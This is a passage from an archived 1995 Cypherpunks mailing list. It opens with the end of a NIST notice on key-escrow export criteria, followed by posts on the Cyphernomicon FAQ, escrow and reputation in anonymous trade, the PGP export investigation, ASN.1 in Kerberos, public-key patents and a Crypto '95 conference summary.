     altered or disabled.


7.   The key escrow mechanism allows access to a user's
     encrypted information regardless of whether that
     user is the sender or the intended recipient of the
     encrypted information.


8.   The key escrow mechanism shall not require repeated
     involvement by the escrow agents for the recovery
     of multiple decryption keys during the period of
     authorized access.


9.   In the event any such product is or may be
     available in the United States, each production
     copy of the software shall either have a unique key
     required for decrypting messages or files that is
     escrowed in accordance with #10, or have the
     capability for its escrow mechanism to be rekeyed
     and any new key to be escrowed in accordance with
     #10.


10.  The product shall accept escrow of its key(s) only
     with escrow agents certified by the U.S. Government
     or by foreign governments with which the U.S.
     Government has formal agreements consistent with
     U.S. law enforcement and national security
     requirements.


Note: Software products incorporating additional
encryption methods other than key escrow encryption
methods will be evaluated for export on the basis of each
encryption method included, as is already the case with
existing products. Accordingly, these criteria apply only
to the key escrow encryption method incorporated by a
software product, and not to other non-escrowed
encryption methods it may incorporate.  For instance,
non-escrowed encryption using a key length of 40 bits
or less will continue to be exportable under existing
export regulations.

- - -

Please also review discussion paper #1 (distributed
earlier), which raises a number of issues involving
exportability criteria and how exportable products could
be designed.  Discussion paper #2 (also previously
distributed) presents questions involving key escrow
agents.


Note:  These issues will be discussed at the Key Escrow
Issues Meeting to be held September 6-7, 1995 (9:00 a.m.
- 5:00 p.m.) at the National Institute of Standards and
Technology (Gaithersburg, Maryland).  The meeting will be
open to the public, although seating is limited.  Advance
registration is requested, please contact Arlene Carlton
on 301/975-3240, fax: 301/948-1784 or e-mail:
carlton@micf.nist.gov.

9/1/95 









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lou Poppler <lwp@mail.msen.com>
Date: Sat, 2 Sep 95 22:06:01 PDT
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Cyphernomicon, and a section on Escrow and Reputations
In-Reply-To: <ac6d2ced00021004ee17@[205.199.118.202]>
Message-ID: <Pine.BSD/.3.91.950902083835.26730A-100000@conch.aa.msen.com>
MIME-Version: 1.0
Content-Type: text/plain


Also available at http://www.msen.com/~lwp/Cyphernomicon.gz

On Fri, 1 Sep 1995, Timothy C. May wrote:

> released it last year, and put it in my anonymous ftp account at
> ftp.netcom.com, in the directory /pub/tc/tcmay, as the file CP-FAQ. Netcom
> is often very crowded, though.
> 
> I know of a couple of alternative places. A very nice job of HTMLizing it
> was done by Jonathan Rochkind, a Cypherpunk, and is located at the URL
> 
> http://www.oberlin.edu/~brchkind/cyphernomicon/
> 
> Another URL, which is just one large file, is
> 
> http://www.swiss.ai.mit.edu/6095/articles/cyphernomicon/CP-FAQ

::::::::::::::::::::::::::::::::::::::
:: Lou Poppler  <lwp@mail.msen.com> ::   No animals were harmed in the
::      http://www.msen.com/~lwp/   ::   production of this message.
::::::::::::::::::::::::::::::::::::::




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: terrell@sam.neosoft.com (Buford Terrell)
Date: Sat, 2 Sep 95 07:42:13 PDT
To: cypherpunks@toad.com
Subject: Re: A problem with anonymity
Message-ID: <199509021451.JAA14144@sam.neosoft.com>
MIME-Version: 1.0
Content-Type: text/plain


>
>Subject: Re: A problem with anonymity
>From: monty.harder@famend.com (MONTY HARDER)
>
>TC> This is one thing that _bonding_ is designed to partially ameliorate. One
>TC> posts a bond which is greater than the amount being carried, or at least is
>
>  A variation of a bond is an escrow agent....
>
>     Overload Alert: I use "escrow" here in the more mundane sense of
>     the folks who collect your real estate taxes and homeowners'
>     insurance from you 1/12th at a time along with your mortgage
>     payment, for instance.
>
>  If the buyer has a =nonymous= agent to recieve the payment, which is
>only released to the seller upon proof(s) of performance (whether in
>lump sum or on a schedule of staged payments tied to specific milestones
>in a long-term project) then the buyer has someone to go after in the
>event of such shenannigans.
>
>TC> There are still scams and manouvers to thwart this reputation capital
>TC> scheme. The agent planning to "defect" (default, split, abscond, renege,
>TC> etc.) can try to pile up as many pending transactions as possible,
>TC> anticipating that the various transactees will be unaware of each other.
>
>  And the escrow method dynamically scales to meet this threat, whereas
>the bond is static.
>
>  Of course, the escrow agent will extract his pound of flesh, just as
>any other form of insurance. Such is the nature of life.
>
Actually, you guys are trying to repeat the whole history of the
law merchant (today's commercial law).  The basic problem was how
can a buyer in one city acquire goods from a seller in another
through agents acting at a distance when neither knows the other
and neither is willing to risk loss on the transaction.

The use of bankers, as either trusted or bonded third parties,
acting as escrowees under the control of a letter of credit was
the result.

Buyer, B, deposits money with the bank, E, with insructions
to release the money on proof of receipt of the goods.  E gives
B a receipt and a written promise to pay.  B trades the promise
to pay to Seller, S, in exchange for the goods.  S, who either
trusts E or has access to his bond, is willing to accept E's
promise to pay, which he then negotiates.  The result is that
B and S have a secure transaction without trusting each other,
and E gets rich.

Notice, we don't care about the reputation or identity of either
B or S, and a very few trusted or bonded Es can facilitate
many many transacrions.

Incidentially, you all are using the word "escrow" correctly.
An escrow is an arrangement in which property is deposited with
an escrowee to hold until the happening or failure of a
contingency, at which time he delivers the property according to
the escrow instructions.  House sales, in which the seller deposits
a deed and the buyer deposits the purchase price pending proof of title
is only one kind of escrow.

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
Buford C. Terrell
South Texas College of Law
1303 San Jacinto, Houston, TX 77002
(713)646-1857    terrell@sam.neosoft.com
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 2 Sep 95 09:39:05 PDT
To: cypherpunks@toad.com
Subject: Re: A problem with anonymity
Message-ID: <ac6dd783060210040223@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:27 PM 9/2/95, Buford Terrell wrote:

>Actually, you guys are trying to repeat the whole history of the
>law merchant (today's commercial law).  The basic problem was how
>can a buyer in one city acquire goods from a seller in another
>through agents acting at a distance when neither knows the other
>and neither is willing to risk loss on the transaction.

Which might be why I specifically cited this last night in an article in
this thread:

"(Think of various trading situations where one has no idea of the True Name
of the other parties: cash-and-carry transactions, flea markets, many
international trade arrangements, etc. As we have discussed in past
discussions of anarchy, the international trading regime is essentially an
anarchy, in that no Higher Authority exists to resolve disputes in a
top-down way...the so-called "Law Merchant" evolved to resolve disputes in
such trading situations.)"

Benson's "The Enterprise of Law" is of course a libertariant outlook on
these matters. (I should mention that Michael Froomkin says he doesn't
think much of it, but I found it useful, especially as it confirmed my
views on these matters! :-})


--Tim May


---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ethridge@Onramp.NET (Allen B. Ethridge)
Date: Sat, 2 Sep 95 07:59:29 PDT
To: cypherpunks@toad.com
Subject: Re: Macintosh Users: "SpeedDoubler"
Message-ID: <v02130500ac6ddb766546@[199.1.11.220]>
MIME-Version: 1.0
Content-Type: text/plain


Tim May wrote:
>For you Macintosh users, I thought I'd share with you my experiences with
>SpeedDoubler, a new utility that (effectively) doubles or even triples
>performance of many applications that still are heavily dependent on 68K
>code (as opposed to purely PowerPC code).
>
> ...
>
>All I can say is that I'm very happy.
>
>--Tim May

Just wanted to echo Tim's sentiments.  I purchased SpeedDoubler yesterday
(fifty-something dollars at Computer City) and the speed improvements i've
seen on my PowerMac 7100/66 are impressive.  It's definitely worth the money.


        allen






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 2 Sep 95 09:54:21 PDT
To: cypherpunks@toad.com
Subject: Re: Cyphernomicon, and a section on Escrow and Reputations
Message-ID: <ac6dda6a08021004b0c3@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:13 AM 9/2/95, Dar Scott wrote:

>After several tries I was not able to get this.  Has anyone made it
>available in an alternate location?
>
>Dar
>(list newbie)
>
>===========================================================
>Dar Scott               Home phone: +1 505 299 9497
>
>Dar Scott Consulting         Voice: +1 505 299 5790  <---
>8637 Horacio Place NE        Email: darscott@aol.com
>Albuquerque, NM  87111              dsc@swcp.com
>                               Fax: +1 505 898 6525
>http://www.swcp.com/~correspo/DSC/DarScott.html

Help me out here, Dar...

You list a Web site in your sig, so presumably you have the right tools to
browse the Web. And I listed two Web sites that have the Cyphernomicon.

What am I missing?

Browsing the Web versions, especially the HTMLized version by Rochkind at
http://www.oberlin.edu/~brchkind/cyphernomicon/  is a much better way to
read it than by downloading the text version.

Nevertheless, if someone wants to copy the CP-FAQ file to their ftp site, I
have no real objections at this time.


--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Sat, 2 Sep 95 10:37:25 PDT
To: cypherpunks@toad.com
Subject: Re: Phil Zimmermann/Amnesty International?
In-Reply-To: <199509021658.MAA29224@frankenstein.piermont.com>
Message-ID: <199509021737.KAA23763@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



Regarding the stature of limitations date on PRZ,

> "Perry E. Metzger" <perry@piermont.com> writes:
>                      The offense in question took place on or before
> September 8, 1992, and the statute of limitations is, to my knowledge,
> three years. Even if it were four years, it would have to be September
> 8th of that year.  Branko Lankester announced availability of PGP 2.0
> on Mon, 7 Sep 1992 at about 20:22 GMT, so since the allegation is that
> he exported PGP Version 1.0 to the team that developed PGP 2.0
> overseas, any export that Phil performed would have of necessity to
> have taken place before then.

PGP 1.0 was available in at least Finland and Australia by 28 Aug 91,
according to an ftp list John Gilmore posted on that date.  However, the
first available date is presumably not as important as the most recent
offense, and I haven't seen which specific allegations the gov't is
investigating.

	Jim Gillogly
	11 Halimath S.R. 1995, 17:35




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Murray <davidm@iconz.co.nz>
Date: Fri, 1 Sep 95 15:46:04 PDT
To: cypherpunks@toad.com
Subject: Re: A problem with anonymity
Message-ID: <199509012245.KAA27969@iconz.co.nz>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----


Tim May said in article <ac6b9e29040210042a10@[205.199.118.202]>:
> At 11:32 PM 8/31/95, Scott Brickner wrote:
..
> >he sells its assets to his own identity at a fraction of their worth,
> >and defaults on the liabilities.
>      ^^^^^^^^^^^^^^^^^^^^^^^^^^^
..
> ideally, one never "trusts" an agent with a transaction greater than the
> value of the reputation capital he will lose if he defaults.
.. 
> Whether cryptographic protocols (cf. the "encrypted open books" proposal by
> eric Hughes for one approach which may be useful) solve this problem is not
> known at this time. But the non-crypto world has of course not solved this
> problem, either.

I've often thought that in a system of digital pseudonyms, where no-one need
trade with a negative reputation (a reputation deficit?), something like
Akerlof's Market for Lemons will arise, and _all_ pseudonyms will be treated
as (reputationally) worthless.

[Akerlof, if I remember my economics right (and I am confident that I will
be corrected if I don't) analysed a market for used cars. There were two
types of cars: good ones, and lemons. A purchaser couldn't tell the difference
until she had bought the car. Since the expected value of a used car was less
than the value of a good car, purchasers wouldn't pay the good car price.
But that would mean owners of good cars wouldn't offer them for sale (in
this market). So the only cars for sale would be lemons :-)]

As Tim points out, this is a non-crypto problem as well, and devices such as
bonds or (which are game-theoretically similar) expensive advertising or
plush premises [if they spent an unrefundable $20million on the Rolling
Stones, they're not likely to throw it all away by ripping you off for
$100 ;-)] are used to convince potential customers of one's bona fides.

How these transfer to the world of cyber-finance, I'm not sure, but I suspect
it leaves a role for True Names in the management of credit risk: as escrow
agents, middlemen, clearing houses etc. [Although, having said that, if the
Akerlof analysis applies, you just *can't* grant (unsecured) credit to
pseudonyms - the percentage of defaulters will be 100...] But these Names are
True only in the sense that they are juridically persistent (that is, if
they transact today, they can be sued tomorrow), and need not be traceable
to any True People (Warm Bodies?) - anonymously held corporations, for
example.

If you can't rely on the unsecured promise of a digital pseudonym, and you
can't accept reputation as 'security', how do you extend credit?

Dm

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMEd+81lo3j8JHzalAQFo0AQAkohUuFg6QwRaY7X5LwF1YXCby1uCKQmI
FfmQHmEa55oeht9Vc4DN1V+dIGjVWRIxS3ib/oRYsXY9HWo8pI3gMKhbnsBf3OzN
jVuoUR8Tgx1HcX59uBjbpxKNHFw5U4gPN70zvbLJhbw1UHWr24tq5RJri22coCh7
1Dm016RMHns=
=rl4c
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 3 Sep 95 00:14:55 PDT
To: adwestro@ouray.cudenver.edu (Alan Westrope)
Subject: Re: Phil Zimmermann/Amnesty International?
In-Reply-To: <jw5RwkkAs2nN084yn@ouray.cudenver.edu>
Message-ID: <199509021658.MAA29224@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Alan Westrope writes:
> On Fri, 01 Sep 1995, Michael Froomkin <mfroomki@umiami.ir.miami.edu> wrote:
> 
> > I think he would have to be charged first.  Have I missed something?
> > PS when does the statute of limitations run out?
> 
> June '96.  Zimmermann and Dubois appeared on a local talk radio show
> recently; a friend happened to catch the program, taped it, and played
> excerpts at a Cypherpunks meeting.  This date was mentioned by Phil Dubois.

That's not possible. The offense in question took place on or before
September 8, 1992, and the statute of limitations is, to my knowledge,
three years. Even if it were four years, it would have to be September
8th of that year.  Branko Lankester announced availability of PGP 2.0
on Mon, 7 Sep 1992 at about 20:22 GMT, so since the allegation is that
he exported PGP Version 1.0 to the team that developed PGP 2.0
overseas, any export that Phil performed would have of necessity to
have taken place before then.

Michael, you are one of our local lawyers. Could you please confirm
the length of the statute of limitations?

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 2 Sep 95 11:01:19 PDT
To: cypherpunks@toad.com
Subject: Cypherpunks Santa Cruz -- Great Party!
Message-ID: <ac6dea8c0a0210047b3a@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


I want to update the general list on how well our "Cypherpunks Santa Cruz"
party/meeting went last Saturday.

Apologies to those who get this twice, as I just sent it out to the folks
on the mailing list of interested folks I keep. (Not all of them are
readers of this list, so....)

It was a great success, from all indications, and we'll be doing it on a
regular basis. "Meet locally, communicate globally."

--Tim


>Date: Sat, 2 Sep 1995 11:03:33 -0700
>X-Sender: tcmay@mail.got.net
>Mime-Version: 1.0
>To: (Recipient list suppressed)
>From: tcmay@got.net (Timothy C. May)
>Subject: Cypherpunks Santa Cruz -- Great Party!
>
>
>This is a report on the Cypherpunks Santa Cruz party/meeting held last
>Saturday at my house. For those of you on this list (52 at last count,
>obviously not all locals) who missed it, it was considered by many who
>commented to me to be a great success.
>
>Some highlights:
>
>- I counted 23 attendees, from as far away as Oregon (Greg Broiles) and San
>Luis Obispo (Jeff Simmons), and with a bunch of folks from Marin and the
>Greater Bay Area.
>
>- We got rolling around 5, when the first cars started filling up my
>parking area. Things kept going 'til 5 in the morning (!), when the last
>stragglers departed and those staying the night found their futons and
>crashed.
>
>- Not too much was formally done. We had a round of introductions (and I
>provided name tags, which were purely voluntary, in that anyone could
>volunteer not to wear them and hence not be remembered by others...most
>wore them). Later, after the barbecue, Bob Fleming and Cherie Kushner
>described their work on micropower, ultrawideband radio "localizers." While
>not strictly "crypto" related, there are overlapping themes (privacy,
>surveillance, and even some of the math overlaps).
>
>- Mostly it was a chance for our local community of folks interested in
>these issues to mingle and make contact. I expect we may have a larger
>focus than just "crypto" (although Cypherpunks have always had a larger
>focus than just cryptography, of course). Especially as there are folks
>doing some neat stuff on the Web out here in Santa Cruz.
>
>- Two folks from my local ISP attended (Jay and Marc), and they have some
>thoughts on possibly hosting the Cypherpunks archive site on their system,
>and other ideas. They stayed until nearly 5 a.m., talking with us about
>networking, Web pages, etc.
>
>(Santa Cruz has long been a hotbed of computer activity, especially of the
>more independent sort. So the good turnout from local folks could be very
>promising for Cypherpunks themes. Interestingly, Linus Torvaldis (sp?), of
>Linux fame, had just been in town a couple of days before.)
>
>I want to avoid opening the meeting up too broadly, to, for example "anyone
>interested in computers," as this would produce unpredictable turnouts and
>lots of folks who want to learn to use Windows, or need help in dBase, etc.
>Better to keep an ostensible focus on "Cypherpunks" themes, with forays
>into related areas.
>
>Some people commented to me that they hope the meetings/parties are
>monthly, but I suspect every other month may be more reasonable...after
>all, a monthly meeting would mean another one only 3 weeks from today, and
>I can't see this happening.
>
>Anyway, I expect to announce another one for sometime in October. I also
>may be having a "PenSFA" party at my place in early November (11/11 is
>being considered), and may merge the two. It's a good opportunity for
>mingling.
>
>Another attendee offered the possibility of having a Cypherpunks Santa Cruz
>meeting/party at her house, so some rotation to other venues may start to
>happen. I think the notion of having these things at private houses is
>better than trying to get space at a local company, for example. Parties in
>houses are more intimate, less formal, and don't require the "corporate
>approvals" that are sometimes needed. Besides, I'm offering my house and
>have no contacts at local companies.
>
>I expect to be able to host a lot of these things, and if some others
>volunteer as well, we'll be set. (I expect attendance will not equal the 23
>at this "first" meeting, for obvious reasons. This means meetings/parties
>could even be held in apartments or condos. But I'm not suggesting this,
>only noting it.)
>
>So, thanks for coming!
>
>--Tim May
>

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jis@mit.edu (Jeffrey I. Schiller)
Date: Sun, 3 Sep 95 00:34:34 PDT
To: cypherpunks@toad.com
Subject: ASN.1 and Kerberos version 5
Message-ID: <ac6e483800021004fa65@[18.162.1.1]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Perry E. Metzger writes:
>I've heard people associated with the decision to use ASN.1 in
>Kerberos V say it was a mistake. Frankly, I think ASN.1 is a blight
>which should be exterminated from the planet.

I'll say it. I was the person who pushed for the use of ASN.1 in Kerberos
version 5. I had this disease at the time that made me think that ASN.1 was
a good idea. I got better, unfortunately we have been living with the
results of my braino for quite some time now... poor Ted.

However, the problem with ASN.1 isn't its waste of space (which actually
isn't that bad for a mechanism for encoding arbitrary objects). The problem
is that it is the product of a standards making process that didn't (and
doesn't) value interoperability. Adherence to the ISO specifications does
not guarantee interoperation. Instead regional "workshops" negotiate
aspects of implementations to obtain interoperation.

What does this mean for ASN.1? It means that the definition of ASN.1 is a
bit abstract (as its name implies). Problems result when two organizations
(say MIT and OSF!) attempt to implement from the specification in ASN.1 but
use different ASN.1 compilers and things then don't work. Arguments then
ensue about whose compiler (or manually written parsing code) is "correct"
in terms of doing the right thing with ASN.1. This is particularly so when
using DER (for Distinquished Encoding Rules) which is itself an
after-thought added to ASN.1 later in the process. It is required in order
to verify digital signatures (which have to be computed on the "encoded"
form of an object because there is no good way to calculate a signature on
an "abstract" object).

If the Kerberos specification said: "pub this byte here and that one there"
none of these arguments and problems would happen.

                                -Jeff

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMEiaf8UtR20Nv5BtAQFzNAP/Q/LuIMbxAPAp64Kn2PSPd600TYlRAUJh
QbsuL/iRhGXWrxSjsFzkcr6e3sIpSFggxglFU38TJT/DG2AD8MOid3Uj4pRJVbyo
z7Au0Vp1NiotmRBHq2udItzJ7LLPM0j38FHQenqPs9mkX2Cq5kVgGUBO94HabEuE
S9XPCgV8E1Q=
=kTyw
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: droelke@rdxsunhost.aud.alcatel.com (Daniel R. Oelke)
Date: Sun, 3 Sep 95 00:34:28 PDT
To: cypherpunks@toad.com
Subject: Basic Public key algorithms.
Message-ID: <9509021801.AA07301@spirit.aud.alcatel.com>
MIME-Version: 1.0
Content-Type: text/plain



After doing quite a bit of poking around, I am somewhat discouraged
in my attempts to find a simple *pure* public key encryption method,
without a lot of other stuff wrapped around it. 

What I need is to encrypt between 45 and 55 bits of information
using a public key algorithm in an embedded environment. 
Memory usage needs to be minimal (a couple of K), and CPU usage 
will be tradded off based on key length.  Decryption speed/memory 
usage is not very limited (done on a workstation, not on embedded
system).

I could use RSA (which is well described in many sources, and has
RSAREF out there),  but I want to avoid the patent issue if possible.  
The sci.crypt FAQ mentions that there are other methods but that 
is about all it says.  Are there any that are not patented?  Are there
any that someone knows of that work well in a limited memory
environment? 

Thanks for any/all pointers.

Dan
------------------------------------------------------------------
Dan Oelke                                  Alcatel Network Systems
droelke@aud.alcatel.com                             Richardson, TX





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Simmons <jsimmons@goblin.punk.net>
Date: Sat, 2 Sep 95 12:13:39 PDT
To: cypherpunks@toad.com
Subject: Cyphernomicon for ftp
Message-ID: <199509021911.MAA15754@goblin.punk.net>
MIME-Version: 1.0
Content-Type: text/plain


I remember the trouble I had finding a text copy of the Cyphernomicon ...

So until someone posts it on a site with higher bandwidth, it's available
at:

ftp.goblin.punk.net/pub/docs/cypherpunk.faq.gz  or  cypherfq.zip

We're talking 400K+ over a 28.8 modem, so don't expect much in the way
of speed ...

-- 
Jeff Simmons                           jsimmons@goblin.punk.net



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 3 Sep 95 00:34:32 PDT
To: droelke@rdxsunhost.aud.alcatel.com (Daniel R. Oelke)
Subject: Re: Basic Public key algorithms.
In-Reply-To: <9509021801.AA07301@spirit.aud.alcatel.com>
Message-ID: <199509021813.OAA29335@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Daniel R. Oelke writes:
> I could use RSA (which is well described in many sources, and has
> RSAREF out there),  but I want to avoid the patent issue if possible.  
> The sci.crypt FAQ mentions that there are other methods but that 
> is about all it says.  Are there any that are not patented?

No, because one patent covers public key cryptography itself, and not
a particular method.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant" <mark@unicorn.com>
Date: Sun, 3 Sep 95 00:34:22 PDT
To: cypherpunks@toad.com
Subject: Dumb Question: PGPfone over Appletalk
Message-ID: <Pine.3.89.9509021905.A22342-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain



Can someone tell me how to run PGPfone over Appletalk ? The
documentation says that support has been added for this release, and
there's a preferences box to check to use it, but there's no information
I can find in the documentation on how to initiate a call over
Appletalk.. it just says to enter a telephone number to dial. If I 
press 'Connect' without entering anything it hangs up the Mac.

How do I tell it which machine I want to connect to ? 

	Mark "Don't know much about Macs" Grant






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: adwestro@ouray.cudenver.edu (Alan Westrope)
Date: Sat, 2 Sep 95 11:18:31 PDT
To: cypherpunks@toad.com
Subject: Re: Phil Zimmermann/Amnesty International?
In-Reply-To: <199509021658.MAA29224@frankenstein.piermont.com>
Message-ID: <WmJSwkkAsSnN084yn@ouray.cudenver.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sat, 02 Sep 1995, "Perry E. Metzger" <perry@piermont.com> wrote:
> Alan Westrope writes:
> >   Michael Froomkin wrote:
> >   > PS when does the statute of limitations run out?
> > June '96.  Zimmermann and Dubois appeared on a local talk radio show
> > recently; a friend happened to catch the program, taped it, and played
> > excerpts at a Cypherpunks meeting.  This date was mentioned by Phil Dubois.

> That's not possible. The offense in question took place on or before
> September 8, 1992, and the statute of limitations is, to my knowledge,
> three years. Even if it were four years, it would have to be September
> 8th of that year.  Branko Lankester announced availability of PGP 2.0
> on Mon, 7 Sep 1992 at about 20:22 GMT, so since the allegation is that
> he exported PGP Version 1.0 to the team that developed PGP 2.0
> overseas, any export that Phil performed would have of necessity to
> have taken place before then.

Point taken.  Dubois was referring specifically to the current California
grand jury investigation in association with U.S. Customs.  He said that
this grand jury has until June '96 to issue an indictment or...uhhh...get
off the pot.

I suppose Phil could be charged by some other entity with ITAR/DTR
violations relating to the "export" of PGP, and I'm not sure what would
be the date of this putative violation:  the date Phil gave the program
to others, allegedly "knowing" that doing so would result in its export;
or the date PGP actually appeared at overseas sites.  I suspect I'm not
the only one confused by this, considering the convoluted, baroque and
outdated laws involved.  Mebbe somebody oughta ask Sternlight...:-)

Alan Westrope                  <awestrop@nyx10.cs.du.edu>
__________/|-,                 <adwestro@ouray.cudenver.edu>
   (_)    \|-'                  2.6.2 public key: finger / servers
PGP 0xB8359639:  D6 89 74 03 77 C8 2D 43   7C CA 6D 57 29 25 69 23

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMEieZVRRFMq4NZY5AQF8aAP+MoWcVxn5tVTJ2+SM5HTGFEQqwVnOae2L
cNUaiq2gnogX3lNBV4Deou9WOauzde13FO9SRlHsqHw8D9YnQI14JburLwn4HCnf
GdKs48DWzrG7HR4n1u2cmhqdm3TI7/ylyBbK2DhlUS98JOO0Q0m9+E6uSUcy+NNM
Mq8y7jSD8f8=
=K8td
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Sun, 3 Sep 95 00:34:37 PDT
To: cypherpunks@toad.com
Subject: Austin Cypherpunks
Message-ID: <199509021825.NAA00547@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi all,

This is of real interest to Austin subscribers only...

It has been over a year since the last real meeting of the Austin
Cypherpunks. I am interested in getting the group back on a regular schedule
and writing code and building hardware. If you share this interest then
please drop me a note at ravage@einstein.ssz.com

I have created a mailing list for the local members and if interested then
send a subscribe austin-cpunks to list@einstein.ssz.com

That is all.

                                            Jim Choate
                                            CyberTects
                                            ravage@einstein.ssz.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dsc@swcp.com (Dar Scott)
Date: Sat, 2 Sep 95 11:44:16 PDT
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <v01510100ac6e4b262274@[198.59.115.117]>
MIME-Version: 1.0
Content-Type: text/plain


Timothy May wrote concerning Cyphernomicon,
>You list a Web site in your sig, so presumably you have the right tools to
>browse the Web. And I listed two Web sites that have the Cyphernomicon.
>
>What am I missing?

Thanks for the advice.  Here are the two missing pieces.

The first is financial, but might be really psychological.  I buy PPP
service locally and it is hard for me to casually browse with the meter
runing in the corner of the screen even at less than a penny a minute.
(And any document that mentions David Friedman probably needs study and
that takes more time.)

The second is that even at the wee hours of the morning I kept getting
refusals from www.oberlin.edu and I couldn't get past the table of
contents.  I had hoped to collect these as I browse 'em to avoid delays
(14.4), hicups and online time in later reading.  (I didn't even try the
large html--I suspect my browsers will gag on it.)

The third of the two reasons is some vague notion of taking it to lunch or
of anotating the file or the hard copy.

In case it wasn't clear--I couldn't get a peep out of netcom.

My plan is to try oberlin again and if that bogs down, try getting the copy
at the location mentioned by Lou Poppler--or any other location mentioned
this weekend.  Or respond to advice on the best times to try netcom.

I appologize for the implicit assumption in my question about alternate
sites that people had your permission to copy the file to their ftp sites
and am pleased that you explicitly gave that blessing in your recent mail.


Thanks,
Dar
(list newbie)



===========================================================
Dar Scott               Home phone: +1 505 299 9497

Dar Scott Consulting         Voice: +1 505 299 5790  <---
8637 Horacio Place NE        Email: darscott@aol.com
Albuquerque, NM  87111              dsc@swcp.com
                               Fax: +1 505 898 6525
http://www.swcp.com/~correspo/DSC/DarScott.html
My preference for attached files are in this order:
AOL, Mime, Binhex4, PGP, UUencode
===========================================================






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Sun, 3 Sep 95 01:00:36 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Crypto '95
Message-ID: <199509021859.OAA02093@bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain



	Perry asked for an overview of Crypto '95.  I missed the rump
session, so hopefully someone else will write about that.

	The best talks were probably by Ross Anderson (Robustness
Principles for Public Key Protocols) and Adi Shamir (Myths and
Realities of Cryptography).

	Since Anderson's paper is in the proceedings, I won't rehash
it here, but Shamir's talk is not, I present his 10 commandments of
Commercial Security:

1.  Don't aim for perfect security.
2.  Don't solve the wrong problem.
3.  Don't try to sell security bottom up.
4.  Don't use cryptographic overkill.
5.  Don't make it complicated.
6.  Don't make it expensive.
7.  Don't use a single line of defense.
8.  Don't forget the mystery attack.
        (Know how to regenerate security when you don't know whats
        going wrong.)
9.  Don't trust systems.
10. Don't trust people.

	In other news:

	Richard Schroeppel, Hillarie Orman (and others) presented some
speedups to elliptic curve systems, based on fast calculation of
reciprocals.  The speedup is about a factor of 3.

	There were some interesting analysis of RC5, SAFER-K64.  

	Bruce Dodsen and Arjen Lenstra presented some interesting
results running  NFS with four large primes.  From their abstract:
"[factoring with 2 large primes] completion time can quite accurately
be predicted...For NFS such extrapolations seem to be impossible--the
number o useful combinations suddenly `explodes' in an as yet
unpredictable way, that we have not yet been able to understand
